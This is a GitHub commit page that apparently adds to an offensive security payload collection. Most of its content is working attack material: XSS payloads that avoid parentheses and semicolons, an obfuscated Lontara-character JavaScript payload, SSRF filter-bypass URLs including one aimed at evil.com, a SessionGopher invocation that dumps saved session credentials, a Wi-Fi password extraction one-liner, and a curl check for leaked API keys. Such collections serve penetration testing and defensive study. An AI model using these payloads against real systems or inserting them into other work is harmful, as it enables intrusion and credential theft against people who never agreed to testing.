Skip to content

Commit

Permalink
XSS without parenthesis, semi-colon + Lontara
Browse files Browse the repository at this point in the history
  • Loading branch information
swisskyrepo committed May 15, 2019
1 parent cc8c7b3 commit 9c2e638
Show file tree
Hide file tree
Showing 5 changed files with 92 additions and 16 deletions.
11 changes: 11 additions & 0 deletions Insecure Source Code Management/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -15,6 +15,7 @@
- [BAZAAR - Source code management](#bazaar---source-code-management)
- [Automatic way : rip-bzr](#automatic-way--rip-bzr)
- [Automatic way : bzr_dumper](#automatic-way--bzr_dumper)
- [Leaked API keys](#leaked-api-keys)

## GIT - Source code management

Expand Down Expand Up @@ -236,6 +237,16 @@ $ bzr revert
N static/
```

## Leaked API keys

If you find any key , use the [keyhacks](https://github.com/streaak/keyhacks) from @streaak to verifiy them.

Twilio example :

```powershell
curl -X GET 'https://api.twilio.com/2010-04-01/Accounts/ACCOUNT_SID/Keys.json' -u ACCOUNT_SID:AUTH_TOKEN
```

## References

- [bl4de, hidden_directories_leaks](https://github.com/bl4de/research/tree/master/hidden_directories_leaks)
Expand Down
1 change: 1 addition & 0 deletions Methodology and Resources/Active Directory Attack.md
Original file line number Diff line number Diff line change
Expand Up @@ -686,3 +686,4 @@ net group "Domain Admins" hacker2 /add /domain
* [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin)
* [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html)
* [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf)
* [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](https://0metasecurity.com/post-oscp-part-2/)
13 changes: 13 additions & 0 deletions Methodology and Resources/Windows - Privilege Escalation.md
Original file line number Diff line number Diff line change
Expand Up @@ -320,6 +320,19 @@ Oneliner method to extract wifi passwords from all the access point.
cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on
```

### Passwords stored in services

Saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP using [SessionGopher](https://github.com/Arvanaghi/SessionGopher)


```powershell
https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1
Import-Module path\to\SessionGopher.ps1;
Invoke-SessionGopher -AllDomain -o
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
```


## EoP - Processes Enumeration and Tasks

What processes are running?
Expand Down
58 changes: 42 additions & 16 deletions Server Side Request Forgery/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -7,6 +7,19 @@
* [Tools](#tools)
* [Payloads with localhost](#payloads-with-localhost)
* [Bypassing filters](#bypassing-filters)
* [Bypass using HTTPS](#bypass-using-https)
* [Bypass localhost with [::]](#bypass-localhost-with----)
* [Bypass localhost with a domain redirection](#bypass-localhost-with-a-domain-redirection)
* [Bypass localhost with CIDR](#bypass-localhost-with-cidr)
* [Bypass using a decimal IP location](#bypass-using-a-decimal-ip-location)
* [Bypass using IPv6/IPv4 Address Embedding](#bypass-using-ipv6-ipv4-address-embedding)
* [Bypass using malformed urls](#bypass-using-malformed-urls)
* [Bypass using rare address](#bypass-using-rare-address)
* [Bypass using bash variables](#bypass-using-bash-variables)
* [Bypass using tricks combination](#bypass-using-tricks-combination)
* [Bypass using enclosed alphanumerics](#bypass-using-enclosed-alphanumerics)
* [Bypass filter_var() php function](#bypass-filter-var-php-function)
* [Bypass against a weak parser](#bypass-against-a-weak-parser)
* [SSRF exploitation via URL Scheme](#ssrf-exploitation-via-url-scheme)
* [file://](#file)
* [http://](#http)
Expand All @@ -15,7 +28,7 @@
* [tftp://](#tftp)
* [ldap://](#ldap)
* [gopher://](#gopher)
* [SSRF to XSS](#ssrf-to-xss-by-d0rkerdevil--alyssaoherrera)
* [SSRF to XSS](#ssrf-to-xss)
* [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances)
* [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket)
* [SSRF URL for AWS Elastic Beanstalk](#ssrf-url-for-aws-elastic-beanstalk)
Expand Down Expand Up @@ -75,14 +88,14 @@ Using this vulnerability users can upload images from any image URL = trigger an

## Bypassing filters

Bypass using HTTPS
### Bypass using HTTPS

```powershell
https://127.0.0.1/
https://localhost/
```

Bypass localhost with [::]
### Bypass localhost with [::]

```powershell
http://[::]:80/
Expand All @@ -98,7 +111,7 @@ http://0000::1:22/ SSH
http://0000::1:3128/ Squid
```

Bypass localhost with a domain redirecting to locahost
### Bypass localhost with a domain redirection

```powershell
http://localtest.me
Expand All @@ -113,16 +126,17 @@ The service nip.io is awesome for that, it will convert any ip address as a dns.
NIP.IO maps <anything>.<IP Address>.nip.io to the corresponding <IP Address>, even 127.0.0.1.nip.io maps to 127.0.0.1
```

Bypass localhost with CIDR : 127.x.x.x
### Bypass localhost with CIDR

It's a /8

```powershell
it's a /8
http://127.127.127.127
http://127.0.1.3
http://127.0.0.0
```

Bypass using a decimal ip location
### Bypass using a decimal IP location

```powershell
http://0177.0.0.1/
Expand All @@ -131,35 +145,41 @@ http://3232235521/ = http://192.168.0.1
http://3232235777/ = http://192.168.1.1
```

Bypass using [IPv6/IPv4 Address Embedding](http://www.tcpipguide.com/free/t_IPv6IPv4AddressEmbedding.htm)
### Bypass using IPv6/IPv4 Address Embedding

[IPv6/IPv4 Address Embedding](http://www.tcpipguide.com/free/t_IPv6IPv4AddressEmbedding.htm)

```powershell
http://[0:0:0:0:0:ffff:127.0.0.1]
```

Bypass using malformed urls
### Bypass using malformed urls

```powershell
localhost:+11211aaa
localhost:00011211aaaa
```

Bypass using rare address, you can short-hand IP addresses by dropping the zeros
### Bypass using rare address

You can short-hand IP addresses by dropping the zeros

```powershell
http://0/
http://127.1
http://127.0.1
```

Bypass using bash variables (curl only)
### Bypass using bash variables

(curl only)

```powershell
curl -v "http://evil$google.com"
$google = ""
```

Bypass using tricks combination
### Bypass using tricks combination

```powershell
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
Expand All @@ -168,7 +188,9 @@ requests + browsers : 2.2.2.2
urllib : 3.3.3.3
```

Bypass using enclosed alphanumerics [@EdOverflow](https://twitter.com/EdOverflow)
### Bypass using enclosed alphanumerics

[@EdOverflow](https://twitter.com/EdOverflow)

```powershell
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
Expand All @@ -177,13 +199,15 @@ List:
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
```

Bypass filter_var() php function
### Bypass filter_var() php function

```powershell
0://evil.com:80;http://google.com:80/
```

Bypass against a weak parser - by Orange Tsai ([Blackhat A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf))
### Bypass against a weak parser

by Orange Tsai ([Blackhat A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf))

```powershell
http://127.1.1.1:80\@127.2.2.2:80/
Expand Down Expand Up @@ -317,7 +341,9 @@ Content of evil.com/redirect.php:
?>
```

## SSRF to XSS by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
## SSRF to XSS

by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)

```bash
http://brutelogic.com.br/poc.svg -> simple alert
Expand Down
25 changes: 25 additions & 0 deletions XSS Injection/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -28,6 +28,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
- [Bypass quotes in mousedown event](#bypass-quotes-in-mousedown-event)
- [Bypass dot filter](#bypass-dot-filter)
- [Bypass parenthesis for string](#bypass-parenthesis-for-string)
- [Bypass parenthesis and semi colon](#bypass-parenthesis-and-semi-colon)
- [Bypass onxxxx= blacklist](#bypass-onxxxx---blacklist)
- [Bypass space filter](#bypass-space-filter)
- [Bypass email filter](#bypass-email-filter)
Expand All @@ -39,6 +40,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
- [Bypass ";" using another character](#bypass-using------using-another-character)
- [Bypass using HTML encoding](#bypass-using-html-encoding)
- [Bypass using Katana](#bypass-using-katana)
- [Bypass using Lontara](#bypass-using-lontara)
- [Bypass using ECMAScript6](#bypass-using-ecmascript6)
- [Bypass using Octal encoding](#bypass-using-octal-encoding)
- [Bypass using Unicode](#bypass-using-unicode)
Expand Down Expand Up @@ -525,6 +527,21 @@ alert`1`
setTimeout`alert\u0028document.domain\u0029`;
```

### Bypass parenthesis and semi colon

```javascript
// From @garethheyes
<script>onerror=alert;throw 1337</script>
<script>{onerror=alert}throw 1337</script>
<script>throw onerror=alert,'some string',123,'haha'</script>
// From @terjanq
<script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script>
// From @cgvwzq
<script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script>
```

### Bypass onxxxx= blacklist

```javascript
Expand Down Expand Up @@ -704,6 +721,14 @@ Using the [Katakana](https://github.com/aemkei/katakana.js) library.
javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!+ウ.ウ)[ツ=++++++++++ホ][ツ](ミ+++++'(-~ウ)')()
```
### Bypass using Lontara
```javscript
='',ᨊ=!+ᨆ,ᨎ=!+ᨆ,ᨂ=+{},ᨇ=ᨊ[ᨆ++],ᨋ=ᨊ[ᨏ=ᨆ],ᨃ=+++ᨆ,ᨅ=ᨂ[ᨏ+ᨃ],ᨊ[ᨅ+=ᨂ[ᨆ]+(ᨊ.ᨎ+ᨂ)[ᨆ]+ᨎ[ᨃ]+++ᨊ[ᨏ]+++ᨂ[ᨆ]+ᨋ][ᨅ](ᨎ[ᨆ]+ᨎ[ᨏ]+ᨊ[ᨃ]+++"(ᨆ)")()
```
More alphabets on http://aem1k.com/aurebesh.js/#
### Bypass using ECMAScript6
```html
Expand Down

0 comments on commit 9c2e638

Please sign in to comment.